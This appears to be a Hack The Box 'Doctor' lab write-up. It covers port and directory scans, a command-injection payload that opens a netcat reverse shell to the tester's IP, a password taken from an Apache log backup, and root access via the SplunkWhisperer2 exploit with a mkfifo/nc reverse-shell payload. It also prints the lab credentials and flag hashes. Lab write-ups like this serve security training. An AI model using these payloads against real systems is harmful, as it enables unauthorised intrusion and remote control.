Skip to content

HTB Doctor done

Doctor

Notes

8089/tcp open  ssl/http Splunkd httpd

OS:

Linux

Technology:

Splunk build: 8.0.5

IP Address:

10.129.2.21

Open ports:

22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
8089/tcp open  ssl/http Splunkd httpd

Users and pass:

Creds - http://doctors.htb/register
U: pentester
Mail: [email protected]
Pass: qwerty123 
---
Creds for user:
L: shaun
P: Guitar123
---

Nmap: 10.129.2.21

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.2.21_nmap 10.129.2.21 ; cat 10.129.2.21_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-11 11:28 CEST
Nmap scan report for 10.129.2.21
Host is up (0.035s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry 
|_/

Add IP to /etc/hosts

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ cat /etc/hosts | grep doctors.htb            
10.129.2.21 doctors.htb

Ffuz: http://doctors.htb

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ ffuf -u http://doctors.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o doctors.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://doctors.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup .md .git 
 :: Output file      : doctors.htb_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

account                 [Status: 302, Size: 251, Words: 22, Lines: 4, Duration: 60ms]
archive                 [Status: 200, Size: 101, Words: 7, Lines: 6, Duration: 118ms]
home                    [Status: 302, Size: 245, Words: 22, Lines: 4, Duration: 54ms]
login                   [Status: 200, Size: 4204, Words: 1054, Lines: 95, Duration: 92ms]
logout                  [Status: 302, Size: 217, Words: 22, Lines: 4, Duration: 72ms]
register                [Status: 200, Size: 4493, Words: 1171, Lines: 101, Duration: 69ms]
reset_password          [Status: 200, Size: 3493, Words: 752, Lines: 77, Duration: 63ms]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 256ms]
:: Progress: [163752/163752] :: Job [1/1] :: 220 req/sec :: Duration: [0:06:04] :: Errors: 0 ::

Create user on the website: http://doctors.htb/register

U: pentester
Mail: [email protected]
Pass: qwerty123

SSRF - revshell

Netcat listener - port 9001

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ netcat -lvnp 9001
listening on [any] 9001 ...

Netcat listener - port 2000

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ netcat -lvnp 2000
listening on [any] 2000 ...
connect to [10.10.14.102] from (UNKNOWN) [10.129.2.21] 44896

Create revshell

Payload: <test src=http://10.10.14.102:9001/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.102'$IFS'2000')>

Script spawn shell

script /dev/null -c bash
CTRL+Z
stty raw -echo ; fg
reset
screen

Read file: /var/log/apache2/backup

Found password: Guitar123
---
web@doctor:/var/log/apache2$ cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

Read flag: user.txt

web@doctor:/var/log/apache2$ su shaun
Password: 
shaun@doctor:/var/log/apache2$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
shaun@doctor:/var/log/apache2$ 
shaun@doctor:/var/log/apache2$ cd ~
shaun@doctor:~$ 
shaun@doctor:~$ ls -a
.   .bash_history  .bashrc  .config  .local    .selected_editor
..  .bash_logout   .cache   .gnupg   .profile  user.txt
shaun@doctor:~$ 
shaun@doctor:~$ cat user.txt 
598ec2738a45e21b80201a68851f0242
shaun@doctor:~$ 
shaun@doctor:~$

Privilege Escalation

List active process

shaun@doctor:/tmp$ ps aux | grep splunk
root        1163  0.0  2.2 267968 90456 ?        Sl   Jul14   0:59 splunkd -p 8089 start
root        1164  0.0  0.4  77664 16084 ?        Ss   Jul14   0:00 [splunkd pid=1163] splunkd -p 8089 start [process-runner]
root        9387  0.0  0.0   2608   600 ?        S    15:26   0:00 /bin/sh /opt/splunkforwarder/etc/apps/_PWN_APP_/bin/pwn.bat
shaun       9400  0.0  0.0  17668   732 pts/0    S+   15:31   0:00 grep --color=auto splunk

Netcat - listener

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ netcat -lvnp 4000
listening on [any] 4000 ...

Exploit: SplunkWhisperer2

SplunkWhisperer2

┌──(kali㉿kali)-[~/…/HTB/HTB_Doctor/SplunkWhisperer2/PySplunkWhisperer2]
└─$ python3 PySplunkWhisperer2_remote.py --host 10.129.2.21 --port 8089 --lhost 10.10.14.102 --lport 5000 --username shaun --password Guitar123 --payload "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.102 4000 >/tmp/f"
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp1tsox2jk.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.102:5000/
10.129.2.21 - - [15/Jul/2025 15:26:37] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

Read flag: root.txt

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Doctor]
└─$ netcat -lvnp 4000
listening on [any] 4000 ...
connect to [10.10.14.102] from (UNKNOWN) [10.129.2.21] 43382
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# 
# cd /root  
# ls -a
.
..
.bash_history
.bashrc
.cache
.config
.dbus
.gnupg
.local
.profile
root.txt
.selected_editor
# cat root.txt
d74c6ad8f136509ba568848b70f5d269
#

References

[SplunkWhisperer2](https://github.com/cnotin/SplunkWhisperer2)

Lessons Learned

Tags